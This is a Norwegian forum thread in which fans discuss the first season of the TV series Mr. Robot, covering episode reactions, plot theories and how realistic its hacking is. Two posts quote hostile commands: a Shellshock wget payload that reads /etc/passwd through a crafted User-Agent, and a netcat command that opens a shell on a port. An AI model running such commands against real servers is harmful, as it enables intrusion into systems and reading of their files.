Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  74 38531
Hei folkens!

Jeg ønsker å anbefale en fantastisk ny serie: Mr. Robot.

http://www.imdb.com/title/tt4158110/?ref_=nv_sr_1

Den har hittil 9.4 på imdb og det er ikke uten grunn!

Hovedrollen spilles av Rami Malek. Han gjør en utmerket og imponerende jobb.

Det er kun 1 episode ute hittil, det er en helt ny serie, og jeg ble lei meg da episoden var over, jeg ville ha mer! Gleder meg veldig til neste episode. Dette er den nye serien alle kommer til å snakke om, det er jeg overbevist om!

Den handler om en anti-sosial hacker som lever et dobbeltliv. Som "tech guy" i et sikkerhetsfirma på dagtid, og hacker om natten! Resten må dere se selv
Sist endret av entusiasten747; 27. juni 2015 kl. 01:55.
Ganske imponerende, de treffer bra på begrepene og bruker de riktig, bommer kanskje et par ganger, men langt ifra så dårlig CSI og andre krim-serier har gjort det.

Ellers ganske spennende serie ja.
Episode 2 var fantastisk, serien imponerer videre og fortsetter der 1. episode avsluttet.

Det eneste som er dritt er ventetiden Vil ha alle episodene NÅ!

Håper dette fortsetter slik og at det blir en lang serie, for fy som jeg relaterer endel med hovedpersonen.

Anbefales!
Queen of Blades
Jonta's Avatar
DonorCrew
Takk for anbefalingen. Bra start. #2 var ikke liiike tight som #1, men pilot's gonna pilot. Fint dilemma han funderer over.

Slutten på episode 2:
SPOILER ALERT! Vis spoiler
Skulle ønske serien var skrevet av George R. R. Martin. For… jeg er ganske sikker på hvordan det gikk.
Bare hyggelig Jonta !

Gøy at du liker serien hittil du også, elsker den jeg hihi.
Mnemonic Courier
Bothrops's Avatar
Drit spennende serie. En av de feteste nye imo.
Sist endret av Bothrops; 4. juli 2015 kl. 22:34.
Episode 3 hadde et problem som begge de to forrige episodene hadde: De er altfor korte :O ! Vil ha mer!!!!

En herlig episode!
Sist endret av entusiasten747; 9. juli 2015 kl. 23:48.
Ligger serien på netflix, viaplay eller hbonordic?
Sitat av dronepungen Vis innlegg
Ligger serien på netflix, viaplay eller hbonordic?
Vis hele sitatet...
Det har jeg ikke sjekket, da jeg ser på serier på en annen måte.

Men serien er helt ny. 3 episode ble vist i USA i går. Så om den kommer tviler jeg ikke på, men jeg vet ikke hvor "raske" streamingtjenestene er.

Hvis du behøver linker til nettsider hvor du kan se det gratis, så send PM.
Måtte le litt når han brukte echo ; echo ; []; som "User client" i wget når han wgetta passwd-filen rett fra webserveren.
Sitat av RandomiZed Vis innlegg
Måtte le litt når han brukte echo ; echo ; []; som "User client" i wget når han wgetta passwd-filen rett fra webserveren.
Vis hele sitatet...
Kan du forsøke å forklare hva det betyr :P? haha
Er ikke så inne i hackeverden, men skulle gjerne ha vært :P Altså å kunne det.
Sitat av entusiasten747 Vis innlegg
Kan du forsøke å forklare hva det betyr :P? haha
Er ikke så inne i hackeverden, men skulle gjerne ha vært :P Altså å kunne det.
Vis hele sitatet...
Han mener nok «User agent», dette er en variabel som sendes med HTTP request'en som identifiserer hvilken nettleser du bruker ovenfor webserveren.
Sitat av dronepungen Vis innlegg
Ligger serien på netflix, viaplay eller hbonordic?
Vis hele sitatet...
Ligger på Popcorn-Time
Elsker serien

Serien blir også lagt ut på hjemmesiden dems så det er ikke noen vits å laste ned
http://www.usanetwork.com/mrrobot
Sitat av entusiasten747 Vis innlegg
Kan du forsøke å forklare hva det betyr :P? haha
Er ikke så inne i hackeverden, men skulle gjerne ha vært :P Altså å kunne det.
Vis hele sitatet...
Antar RandomiZed snakker om første episode hvor Elliot utnytter en sårbarhet i Bash kalt Shellshock.

Kode

wget -U "() [ test;];echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4
Var relativt mye panikk i sikkerhetsverden for en stund tilbake når denne sårbarheten ble oppdaget, da "alle" kunne kjøre vilkårlig kommandoer/kode mot sårbare servere.

Du kan lese mer om Shellshock her: http://www.symantec.com/connect/blog...-vulnerability
Sist endret av s1gh; 10. juli 2015 kl. 02:24.
Har ikke opplevd samme spenning siden Prison Break og Breaking Bad.
For de som ikke har sett og nøler: se for dere en blanding av Matrix, Fight Club og Prison Break, så har dere en anelse av hva dere har i vente..
Queen of Blades
Jonta's Avatar
DonorCrew
S01E03-spoiler:
SPOILER ALERT! Vis spoiler
De hadde en én-setnings forklaring på hvorfor alle kaller det "Evil-corp" i episode 1. Men jeg husker den ikke, og synes det virker teit. Hvorfor skulle til og med nyhetslesere kalle det "Evil-corp"? Det er ikke noe Veridian Dynamics ville gått med på engang.

Set-up-episode. Interessant med forholdet mellom han unge fremadstormende og ho danske.
Dette er en serie som får deg til å tape over webcameraet på laptopen ;-)
Sitat av Jonta Vis innlegg
S01E03-spoiler:
SPOILER ALERT! Vis spoiler
De hadde en én-setnings forklaring på hvorfor alle kaller det "Evil-corp" i episode 1. Men jeg husker den ikke, og synes det virker teit. Hvorfor skulle til og med nyhetslesere kalle det "Evil-corp"?
Vis hele sitatet...
Fordi:
SPOILER ALERT! Vis spoiler
Elliont nevnte han hadde hatt en intens reprogrammeringssesjon (selv-hypnose?) hjemme hvor han tillærte seg selv å kun høre og lese "Evil-corp" uansett hva folk sa. Og siden serien følger hans perspektiv er det alt vi hører.


Anbefaler uansett å se første episoden om igjen etter en stund. Det er et par klare hint der inne som gjør ting rimelig klart for meg hva som egentlig foregår.
Såpekoker av rang
Dette virka overraskende bra. Thanks!
Likte serien. Fikk litt følelsen av at Malek er internettens svar på Dexter
Sitat av s1gh Vis innlegg
Antar RandomiZed snakker om første episode hvor Elliot utnytter en sårbarhet i Bash kalt Shellshock.

Kode

wget -U "() [ test;];echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4
Var relativt mye panikk i sikkerhetsverden for en stund tilbake når denne sårbarheten ble oppdaget, da "alle" kunne kjøre vilkårlig kommandoer/kode mot sårbare servere.

Du kan lese mer om Shellshock her: http://www.symantec.com/connect/blog...-vulnerability
Vis hele sitatet...
Dere som faktisk har litt mer datakunnskaper enn oss andre, hvor overbevisende er serien for dere? Virker det "autentisk" liksom? Er det i det hele tatt mulig å hacke folk slik han gjør i serien?

Jeg bare elsker hele verdenssynet hans og hvordan hele dialogen er satt opp. Det er så jævlig fantastisk bra, og helt klart en noe "smartere" serie enn mye annet som er på TV for tiden med tanke på hvor mye den får seeren til å tenke.
Sitat av Boo-Boo Vis innlegg
Dere som faktisk har litt mer datakunnskaper enn oss andre, hvor overbevisende er serien for dere? Virker det "autentisk" liksom? Er det i det hele tatt mulig å hacke folk slik han gjør i serien?

Jeg bare elsker hele verdenssynet hans og hvordan hele dialogen er satt opp. Det er så jævlig fantastisk bra, og helt klart en noe "smartere" serie enn mye annet som er på TV for tiden med tanke på hvor mye den får seeren til å tenke.
Vis hele sitatet...
Dette er nok den serien jeg har sett som har vært nærmest den virkelige verden med tanke på data, dem bruker stortsett korrekte uttrykk til riktig tid, dem bruker datasystemer og programvare som finnes i den virkelige verden og han utnytter sårbarheter som også eksisterer i den virkelige verden.

I andre lignende serier, så har dem ofte operativsystemer og programvare som bare eksisterer på serien, dem utnytter sårbarheter som også bare eksister i serien, ofte med disse "super hacke" programmene dems.

Jeg vil si at så langt i denne serien så har det bare vært noen få avvik fra den virkelige verden. Blant annet brukte han et program i episode 1 eller 2 som jeg ikkje helt husker navnet på, men det var noe som atsu eller astu. Dette programmet hadde jeg aldri hørt om så jeg pauset serien og googlet etter det uten å finne noe info om det. Godt mulig at denne programvaren eksisterer i den virkelige verden, men jeg har aldri vært borti det.
Sitat av 0xFF Vis innlegg
Dette er nok den serien jeg har sett som har vært nærmest den virkelige verden med tanke på data, dem bruker stortsett korrekte uttrykk til riktig tid, dem bruker datasystemer og programvare som finnes i den virkelige verden og han utnytter sårbarheter som også eksisterer i den virkelige verden.

I andre lignende serier, så har dem ofte operativsystemer og programvare som bare eksisterer på serien, dem utnytter sårbarheter som også bare eksister i serien, ofte med disse "super hacke" programmene dems.

Jeg vil si at så langt i denne serien så har det bare vært noen få avvik fra den virkelige verden. Blant annet brukte han et program i episode 1 eller 2 som jeg ikkje helt husker navnet på, men det var noe som atsu eller astu. Dette programmet hadde jeg aldri hørt om så jeg pauset serien og googlet etter det uten å finne noe info om det. Godt mulig at denne programvaren eksisterer i den virkelige verden, men jeg har aldri vært borti det.
Vis hele sitatet...
Det kan også spekuleres i at han bruker programvare han har kodet selv, siden det er en måte å kunne bruke sårbarheter lengre. Det er som kjent veldig få bra metoder som ligger ute på internett siden da vil de slutte å fungere, fordi for mange veit om sårbarheten og folk begynner å fikse den.
Sist endret av Ekvivokk; 12. juli 2015 kl. 03:46.
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av 0xFF Vis innlegg
Dette er nok den serien jeg har sett som har vært nærmest den virkelige verden med tanke på data, dem bruker stortsett korrekte uttrykk til riktig tid, dem bruker datasystemer og programvare som finnes i den virkelige verden og han utnytter sårbarheter som også eksisterer i den virkelige verden.
Vis hele sitatet...
Samtidig er det nær utenkjeleg at ein unix ikkje har nytta shadows siste tjue åra, så realiteten er så som så. Dei har tatt rimelig mykje kunstneriske friheter, så skilnaden frå fri fantasi er rimeleg marginal. Det er heller snakk om namedropping enn å bruke reelle sikkerhetshol.
SPOILER ALERT! Vis spoiler

nc -l -p 1234 -e /bin/sh


https://en.wikipedia.org/wiki/Passwd#Shadow_file
Hvis de hadde brukt 100% autentiske exploit kits og installert de på riktig måte så hadde de nok kunne blitt straffet for å lære nasjonen hacking. Det er et par scener som skurrer litt (fokus på DAT-filer i *nix? Diskusjoner om KDE/Gnome? Burde ha vært et blodig slagsmål), men de er milevis unna CSI-nivå og da er det bra nok for meg. Det viser at de har faktisk konsultert noen som har litt peiling underveis i skriveprosessen. I tillegg har de et par småting gjemt unna til de som har litt peiling også, f.eks. ShellShock.
Sitat av zlagther Vis innlegg
Det kan også spekuleres i at han bruker programvare han har kodet selv, siden det er en måte å kunne bruke sårbarheter lengre. Det er som kjent veldig få bra metoder som ligger ute på internett siden da vil de slutte å fungere, fordi for mange veit om sårbarheten og folk begynner å fikse den.
Vis hele sitatet...
Ja, det kan godt hende, men dette var ikkje en programvare han brukte hjemme. Dette var programvaren han brukte på evil-corp sin server hall når han og sjefen reiste ditt for å stoppe root-kit'et

Sitat av slashdot Vis innlegg
Samtidig er det nær utenkjeleg at ein unix ikkje har nytta shadows siste tjue åra, så realiteten er så som så. Dei har tatt rimelig mykje kunstneriske friheter, så skilnaden frå fri fantasi er rimeleg marginal. Det er heller snakk om namedropping enn å bruke reelle sikkerhetshol.
SPOILER ALERT! Vis spoiler

nc -l -p 1234 -e /bin/sh


https://en.wikipedia.org/wiki/Passwd#Shadow_file
Vis hele sitatet...
Som jeg skrev i den tidligere posten min, så er det noen avvik fra den virkelige verden. Men at du henger deg i at password ikkje var beskyttet med shadows etter at han utførte et shellshock angrep for å få tak i filen er ganske utrolig. Sist jeg installerte et linux system ved bruk av grafisk veiviser, så var det et spørsmål om man ønsket å bruke shadowfil.

Så vidt jeg vet, og som det står skrevet på wikipedia så er shellshock et reelt sikkerhetshull.

https://en.wikipedia.org/wiki/Shells...oftware_bug%29

Og den har til å med fått et CVE nummer CVE-2014-6271

Og jeg skrev også i posten min at det er dette er den serien som jeg har sett som vært nærmest den virkelige verden med tanke på data, ikkje at den er korrekt på hvert eneste punkt. Men det kan jo hende at du har sett en underholdningsserie som er mer korrekt?
Sist endret av 0xFF; 12. juli 2015 kl. 15:24.
Utrolig bra serie foreløpig. Takk for tipset!
Hvem er stemmeskuespilleren, for fisken, når han tripper? Stemmen minnet meg veldig om Kevan Brighting (stemmen til "the narrator" i The stanley parabel), men ser det ikke i filmografien hans.
Har hørt stemmen før men er ikke sikker. Klarer ikke finne det ut via google heller, men fisken heter Qwerty tror jeg.

“There’s only one thing you can do for a brotha in a fish bowl. MOVE ME TO THE GOD DAMN WINDOW!!!”
Stemmen til qwerty er Keith David etter hva jeg hører.
Ser også at flere og flere rundt om som mener det er han.
Tanker om serien så langt:

SPOILER ALERT! Vis spoiler
Etter å ha sett de første episodene føler jeg en kobling med storylinen til Fight Club, og kan ikke annet enn å tenke at hele fsociety er en vrangforestilling, at alt foregår inne i Elliots eget hode, og at han, ute etter å gjøre det rette og hevne hans far, lager Mr.Robot som blir hans alter ego. Mtp. hele greia om den oppdiktede vennen i introen på første episode, Mr.Robot som roper i t-banen uten noen reaksjon fra andre enn Elliot, Darlene som kommer på døra hans på den måten etc.
Føler spesielt forrige episode gjorde det tydelig. Og det virker som alteregoet tar kontroll når han er rusa, noe som forklarer hvorfor han ikke husker det så godt.
Et problem med den Tyler Durden-teorien deres er at hun dama som dreiv og gikk inn i leiligheten hans møtte dealeren hans så vidt jeg husker. Så hun kan altså ikke være imaginær og dermed kan heller ikke mr. Robot være det. Skyt meg om jeg tar feil.

...Med mindre de har kopiert fight club til punkt og prikke og Elliot i rusa tilstand har samla sammen en gjeng hackere uten å være klar over det.
Sist endret av Fatass Skinny; 17. juli 2015 kl. 12:36. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
Sitat av Fatass Skinny Vis innlegg
Et problem med den Tyler Durden-teorien deres er at hun dama som dreiv og gikk inn i leiligheten hans møtte dealeren hans så vidt jeg husker. Så hun kan altså ikke være imaginær og dermed kan heller ikke mr. Robot være det. Skyt meg om jeg tar feil.

...Med mindre de har kopiert fight club til punkt og prikke og Elliot i rusa tilstand har samla sammen en gjeng hackere uten å være klar over det.
Vis hele sitatet...
Darlene og Shayla blir jo introdusert for hverandre inne hos Elliot men siden han faktisk er til stede (unreliable narrator) så ville jeg ikke sagt at det beviser så mye. Mr Robot har jo snakket til/med han feite hackeren og fått respons to ganger allerede men Elliot er fortsatt til stede.

Når det kommer til resten av crewet så er jeg rimelig sikker på at de er virkelige. Darlene og frøken hijab er ute på eventyr i episode 4 og det viser seg at Darlene har hatt noe på gang med den hackende rapperen. Samtidig stjeler de to andre karene en bil. Elliot var ikke til stede under disse hendelsene og vi kan derfor ikke se det fra hans perspektiv med mindre han fortsatt ligger i koma på sykehuset.
Det jeg mente er at alle, utenom elliot (som er hans alterego) er virkelige personer. Altså fullt ut Fight Club stil. Han har gjennom sitt alterego laget hele denne hackergruppen - og de andre forstår nok ikke at det er 2 ulike personer. Når han tror elliot sier noe til de, så er det egentlig han selv som sier det.

Dette forklarer hvorfor han er så viktig for elliot, og hvorfor elliot ikke vil forlate han uansett hva. Og scenen hvor han ruser ser på heroin og tar på seg maske føler jeg prøver å vise at det er han som spiller inn (og har spillt inn) alle disse filmene når han ruser seg. Han bare husker det aldri etterpå.
Hvordan er denne serien for folk som ikke har peiling på hacking? Når folk sier den er så bra frister det men er usikker på om jeg får med meg alt som skjer
Fordi om serien har en veldig realistisk begrepsforståelse; er den fortsatt rimelig overfladisk; tror du vil få med deg det meste.

Serien er også bra på andre plan.

Jeg vil si den har elementer fra Touch( god mellommenneskelig skildring ) og Enter the Void( filming. ) det hele har en gjennomføringsevne på høyde med Shawshank Redemption.
Sist endret av nudo; 18. juli 2015 kl. 04:28.
Personlig likte jeg denne serien veldig godt. Desverre er jeg ikke flink til å vente på episoder. Jeg venter heller til sesongen er ferdiig slik at jeg kan se alt på en gang.
Elsker Mr.Robot har fulgt med siden pilot leaken, elsker castingen og hele settingen.

Er kanskje noen små flaws, men man merker det nesten ikke.....

Det jeg lurer på er hvor serien kommer til å gå, jeg blir nesten bare mer og mer forvirret etter hver episode som går.
Kong Harald
Spoony's Avatar
Forfatteren bak serien postet dette på twitter i går;

http://bildr.no/image/MWJHRW81.jpeg

Vi har mye å glede oss til fremover!
Tastaturkriger
Deezire's Avatar
Jeg syntes de tre første episodene var veldig bra, men snakk om å ta nose dive på episode fire. Jeg klarer ikke helt å sette fingeren på hva det var, men det var bare ... dårlig.
Park Supervisor
NodSquad's Avatar
Han er utrolig flink til å spille weird han fyren. Har trua på denne serien. Spennende og høyst aktuelt synes jeg!
Sitat av Deezire Vis innlegg
Jeg syntes de tre første episodene var veldig bra, men snakk om å ta nose dive på episode fire. Jeg klarer ikke helt å sette fingeren på hva det var, men det var bare ... dårlig.
Vis hele sitatet...
Helt enig. Til slutt gadd jeg ikke følge med... det skjedde bare så lite interessant over veldig lang tid..

Håper de klarer å lande igjen, og beholde kvaliteten fra episode 1-3.

Typisk at en slik serie starter jæævlig bra, blir super hypa, får ekstremt høy IMDB rating, også faller....
▼ ... noen uker senere ... ▼
Jeg synes den har tatt seg opp igjen, de siste episodene har vært sykt spennende
▼ ... over en uke senere ... ▼
Æsj, siste episode av 1. sesong er utsatt til neste uke buhuu.....
▼ ... over en uke senere ... ▼
Queen of Blades
Jonta's Avatar
DonorCrew
Sesongfinale-spoiler: (husk å se etter rulleteksten også)

SPOILER ALERT! Vis spoiler
Veldig spent på sesong 2 nå. Hvor mye tid vil gå mellom de to? Kommer vi til å se en massiv rekonstruering av samfunnet? Hva er «den vanlige måten» å håndtere hovedpersonen på? Hvem var det som kom på døra hans?
Nå hva synes vi? Håper virkelig denne serien får leve videre
Sitat av Deezire Vis innlegg
Jeg syntes de tre første episodene var veldig bra, men snakk om å ta nose dive på episode fire. Jeg klarer ikke helt å sette fingeren på hva det var, men det var bare ... dårlig.
Vis hele sitatet...
Like overrasket som deg. Aldri opplevd lignende, men så har ikke jeg sett så mange tv-serier heller